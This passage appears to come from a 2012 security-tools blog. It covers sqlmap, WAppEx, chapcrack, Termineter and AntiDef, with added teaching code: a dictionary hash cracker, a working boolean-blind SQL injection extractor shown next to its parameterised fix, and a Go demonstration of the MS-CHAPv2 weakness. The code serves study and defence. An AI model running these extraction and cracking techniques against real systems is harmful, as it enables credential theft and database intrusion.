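_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def identify(hash_hex):
    return _BY_LENGTH.get(len(hash_hex))


def dictionary_crack(hash_hex, wordlist):
    """Hash each candidate with the guessed algorithm; return the match or None.
    Unsalted digests are compared directly, which is why a wordlist works."""
    algo = identify(hash_hex)
    if algo is None:
        return None
    target = hash_hex.lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode("utf-8")).hexdigest() == target:
            return word
    return None


WORDLIST = ["letmein", "admin", "password", "cisco"]   # constructed tiny wordlist

if __name__ == "__main__":
    print(cisco7_decode("094F471A1A0A"))
    print(dictionary_crack("5f4dcc3b5aa765d61d8327deb882cf99", WORDLIST))
```

On real engagements the wordlist is a file read line by line, and salted formats (such as crypt-style or bcrypt hashes) need the salt and iteration count applied per candidate, which this length-based guesser does not attempt.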
How to run the software?
Download the HashCodeCrackerv121.jar file. Method 1: double-click the jar file; it will run with the installed JRE. Method 2: open a terminal, navigate to the directory containing the jar file and run "java -jar HashCodeCrackerv121.jar".
Download it from Here
http://code.google.com/p/password-cracker/downloads/list
Posted 8th August 2012 by BreakTheSec
sqlmap: automatic SQL injection attack tool
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Features
o Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
o Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
o Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
o Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
o Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
o Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
o Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
o Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
o Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
o Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
o Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
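An added example, not code from sqlmap, PySQLi or jSQL Injection: boolean-based blind extraction, the technique all three tools automate, against a constructed in-memory SQLite application. The vulnerable lookup concatenates the username into the query and reveals only whether a row matched; the attacker turns that single bit into a whole value by binary-searching each character's code point. The parameterised lookup next to it shows the fix and yields nothing to the same payloads. The users table, the admin row and the stored hash are all made up.

```python
import sqlite3

# Constructed sample data: the "admin" row stores an unsalted MD5 of a weak
# password (not a real credential).
SECRET_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", SECRET_HASH), ("guest", "d41d8cd98f00b204e9800998ecf8427e")],
    )
    conn.commit()
    return conn


def user_exists_vulnerable(conn, username):
    """Deliberately vulnerable lookup: the value is concatenated into the SQL.
    The caller only learns whether some row matched, which is exactly the
    one-bit oracle that boolean-based blind injection needs."""
    sql = "SELECT id FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, username):
    """Hardened form: a bound parameter can never change the query structure."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def _ask(conn, oracle, condition):
    """Inject so the WHERE clause becomes:  username = '' OR (condition) --'"""
    return oracle(conn, "' OR (%s) --" % condition)


def blind_extract(conn, oracle, subquery, max_len=64):
    """Boolean-based blind extraction of the single value `subquery` yields,
    e.g. "SELECT password FROM users WHERE username='admin'".

    The length is found first, then each character by binary search over its
    code point (about seven oracle calls per character instead of one per
    candidate). Returns "" when the oracle never answers True."""
    length = 0
    for i in range(1, max_len + 1):
        if _ask(conn, oracle, "length((%s)) >= %d" % (subquery, i)):
            length = i
        else:
            break
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if _ask(conn, oracle, cond):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    target = "SELECT password FROM users WHERE username='admin'"
    print("vulnerable:", blind_extract(db, user_exists_vulnerable, target))
    print("hardened:  ", repr(blind_extract(db, user_exists_safe, target)))
```

Against a real application the oracle function would send an HTTP request and classify the response (status, length or a marker string), and a time-based variant would replace the boolean condition with a conditional delay; the search logic stays the same.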
Download SQLMap
http://sourceforge.net/projects/sqlmap/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec
Termineter : smart meter testing framework
Termineter is a framework written in Python that provides a platform for the security testing of smart meters. It implements the C12.18 and C12.19 protocols for communication. Currently supported are meters using C12.19 with 7-bit character sets. Termineter communicates with smart meters over a serial connection through an ANSI type-2 optical probe.
Basic Steps
Below is a summary of the basic steps to get started with Termineter after the environment has been configured.
o Connect the optical probe to the smart meter and start termineter
o Configure the connection options. On Windows this would be something like COM1, and on Linux something like /dev/ttyS0. Check "Configuring the Connection" in the documentation for more details.
o Use the connect command, this will also check that the meter is responding.
Will Termineter integrate with Metasploit?
No, Termineter will not integrate with Metasploit. Because of the highly specialized nature of the application there is no need to integrate with Metasploit at this time.
Will Termineter work with Non-ANSI Meters?
No, Termineter will only support meters that conform to the ANSI standards, specifically ones that support C12.18 and C12.19.
Can Termineter read how much power is being used?
Technically yes, if the tables can be accessed. The information would however be raw and unparsed. Because Termineter was designed with a focus on the need for a security-oriented tool, most consumer-related features have not been fully developed. This may change at a later point as development continues.
Download Termineter
http://code.google.com/p/termineter/downloads/list
Posted 8th August 2012 by BreakTheSec
WAppEx : Web Application Exploiter
WAppEx is an integrated platform for penetration testing and exploitation of web applications on Windows or Linux. It can automatically check for a wide range of security vulnerabilities in the given target and then lets you run various payloads to exploit them.
WAppEx is a multi-platform application and runs on Linux and Windows.
WAppEx's database, which includes hundreds of exploits, provides automated, comprehensive and reliable exploitation for penetration testers and security professionals worldwide.
Regular database updates are available. Top priorities are high-risk and zero-day vulnerabilities.
The payloads used in exploits are reliable payloads including connect-back, listener shell, arbitrary code execution, arbitrary file upload and more.
WAppEx's script-based engine lets experienced users write their own scripts and payloads to test and exploit any vulnerability in web applications.
Software and vulnerability updates are available at any time, and daily support is available via phone or email.
WAppEx can exploit the following web application vulnerabilities:
SQL Injection:
The most dangerous vulnerability in web applications. WAppEx uses the Havij (Advanced SQL Injection Tool) engine to find and exploit this vulnerability.
Remote File Inclusion:
It allows an attacker to include a remote file. WAppEx can check for this vulnerability and run various payloads to execute commands on the web server.
Local File Inclusion:
It allows an attacker to include a local file. Just like RFI, WAppEx tests and exploits this vulnerability.
OS Commanding:
It lets an attacker execute OS commands on the server. WAppEx tests and exploits this vulnerability to run custom commands and get a reverse shell.
Script injection:
It can be used by an attacker to introduce (or "inject") script into a web application. WAppEx automatically tests and exploits this vulnerability to escalate access to the web server and get a reverse shell.
Local File Disclosure:
As the name says, it discloses the content of local files on the web server. WAppEx can exploit this vulnerability to read sensitive files on the server.
WAppEx contains the following tools to help you in penetration testing and exploiting web apps.
o Online Hash Cracker: A tool for cracking hashes using reverse lookups on online sites.
o Encoder/Decoder: An encoder/decoder with a complete set of encryption algorithms.
o Find Login Page: It looks for login pages on a target.
o Browser: A small browser you can use to view source code and HTTP headers.
WAppEx is easy to use and flexible. Whether you are a beginner or a professional, WAppEx makes your work easier, faster and more effective.
Download
http://itsecteam.com/products/web-application-exploiter-wappex/#tabset-tab-2
Posted 8th August 2012 by BreakTheSec
chapcrack: A tool for cracking MS-CHAPv2 network handshakes
Chapcrack is a tool for parsing and decrypting MS-CHAPv2 network handshakes. To use it, a packet capture containing an MS-CHAPv2 handshake must be obtained. The tool parses the relevant credential material out of the handshake. In other words, Chapcrack extracts the credential information from MS-CHAPv2 handshakes and sends it to CloudCracker, which in turn returns what Chapcrack needs to decrypt the capture and recover the password.
The resulting file (the "token") is then submitted to CloudCracker, an online password cracking service for penetration testers and network auditors, which returns the cracked MD4 hash in under a day. For each handshake, chapcrack outputs the username, the known plaintext and the two known ciphertexts, and cracks the third DES key itself. What is interesting is that CloudCracker forwards your handshake information to a Pico Computing DES cracking box, an FPGA system that implements DES as a real pipeline with one DES operation per clock cycle. With 40 cores at 450 MHz, that's 18 billion keys/second!
The returned hash is fed back into chapcrack, and the entire network capture is decrypted. Alternatively, the hash can be used to log in to the user's VPN service or WPA2 Enterprise RADIUS server. All of this is possible only because of the weak protocol architecture, which lets whoever holds the MD4 hash of the user's password authenticate as that user and decrypt any of their traffic.
How do you use chapcrack?
o Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance).
o Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap).
o Submit the CloudCracker token to www.cloudcracker.com
o Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n )
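As an added example (not code from chapcrack or CloudCracker), the Go program below builds the MS-CHAPv2 ChallengeResponse as RFC 2759 specifies and shows the structural weakness the post describes: the NT hash is cut into three DES keys that all encrypt the same known plaintext, and the third key carries only 16 unknown bits. The function names, the challenge strings and the 16-byte NT hash value are constructed for illustration; the MD4 step that produces a real NT hash is taken as given.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
)

// challengeHash (RFC 2759 8.2) is the 8-byte known plaintext all three DES blocks encrypt.
func challengeHash(peer, auth []byte, user string) []byte {
	sum := sha1.Sum(bytes.Join([][]byte{peer, auth, []byte(user)}, nil))
	return sum[:8]
}

// desEncrypt8 runs one DES block under a 7-byte key; the 56 key bits are spread
// over 8 bytes with the parity bit left zero (crypto/des ignores parity bits).
func desEncrypt8(k7, block []byte) []byte {
	bits := binary.BigEndian.Uint64(append([]byte{0}, k7...))
	k8 := make([]byte, 8)
	for i := range k8 {
		k8[i] = byte(bits>>(49-7*uint(i))&0x7F) << 1
	}
	c, _ := des.NewCipher(k8) // only errors on a wrong key length
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntResponse (RFC 2759 8.5): the 16-byte NT hash (MD4 of the UTF-16LE password, taken
// as given here) is zero-padded to 21 bytes and cut into three 7-byte DES keys.
func ntResponse(ntHash, chash []byte) (resp []byte) {
	padded := append(append([]byte{}, ntHash...), 0, 0, 0, 0, 0)
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desEncrypt8(padded[i:i+7], chash)...)
	}
	return resp
}

// recoverLastTwo is the weak spot: the third key is NT-hash bytes 14-15 plus five
// zero bytes, so 2^16 trial encryptions of the known plaintext reveal those bytes.
func recoverLastTwo(chash, resp []byte) (int, bool) {
	for i := 0; i < 1<<16; i++ {
		key := []byte{byte(i >> 8), byte(i), 0, 0, 0, 0, 0}
		if bytes.Equal(desEncrypt8(key, chash), resp[16:24]) {
			return i, true
		}
	}
	return 0, false
}
```

The first two blocks are full 56-bit DES keys encrypting the same plaintext, which is the single DES search CloudCracker performs; the third block falls out locally, as described above.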
Download chapcrack
https://github.com/moxie0/chapcrack
Posted 8th August 2012 by BreakTheSec
AntiDef Defacement Protector V-1.0 - Anti defacement command line tool
AntiDef was developed by Nir Valtman to deal with defacement attacks. The tool is written in Java in a quick-and-dirty manner; however, it works.
How does AntiDef work?
AntiDef compares two directory paths: the web application and its backup folder. It hashes each file in both folders (MD5, chosen for performance) and then computes a final hash over all the file hashes. The final hashes of the source and the destination are compared; if they differ, a defacement has been found. In that case, only the defaced files are moved (by default) to a pre-defined "Defaced" folder and then replaced by the legitimate backup files. The "Defaced" folder then contains the malicious files, a timestamp of the defacement and a log.
AntiDef compares the two paths every 60 seconds by default, but the interval can be set differently.
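An added Go sketch (not AntiDef's own Java code) of the comparison described above: per-file MD5 hashes under each root, a final hash over all of them, and the list of paths that would be quarantined and restored once the final hashes differ. The function names hashTree and defaced are this example's own, and any directories or file contents used to exercise it are constructed.

```go
package main

import (
	"crypto/md5"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"sort"
)

// hashTree returns the MD5 of every regular file under root, keyed by relative
// path, plus one final MD5 over all per-file hashes. WalkDir visits entries in
// lexical order, so the final hash is deterministic for identical trees.
func hashTree(root string) (map[string]string, string, error) {
	files, final := map[string]string{}, md5.New()
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err != nil || !d.Type().IsRegular() {
			return err
		}
		data, err := os.ReadFile(p)
		if err != nil {
			return err
		}
		rel, _ := filepath.Rel(root, p)
		files[rel] = fmt.Sprintf("%x", md5.Sum(data))
		fmt.Fprintf(final, "%s\x00%s\n", rel, files[rel])
		return nil
	})
	return files, fmt.Sprintf("%x", final.Sum(nil)), err
}

// defaced lists the paths that would be quarantined and restored once the final
// hashes differ: files whose content differs from the backup, files present only
// in the live tree, and files present only in the backup (deleted pages).
func defaced(live, backup map[string]string) []string {
	var out []string
	for p, h := range live {
		if backup[p] != h {
			out = append(out, p)
		}
	}
	for p := range backup {
		if _, ok := live[p]; !ok {
			out = append(out, p)
		}
	}
	sort.Strings(out)
	return out
}
```

A monitor loop would call hashTree on both roots every 60 seconds, compare only the final hashes, and call defaced just when they differ.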
The full manual is shown by running the tool without parameters, i.e.
java -jar AntiDef.jar
Download AntiDef
http://sourceforge.net/projects/antidef/files/latest/download?source=files
Posted 8th August 2012 by BreakTheSec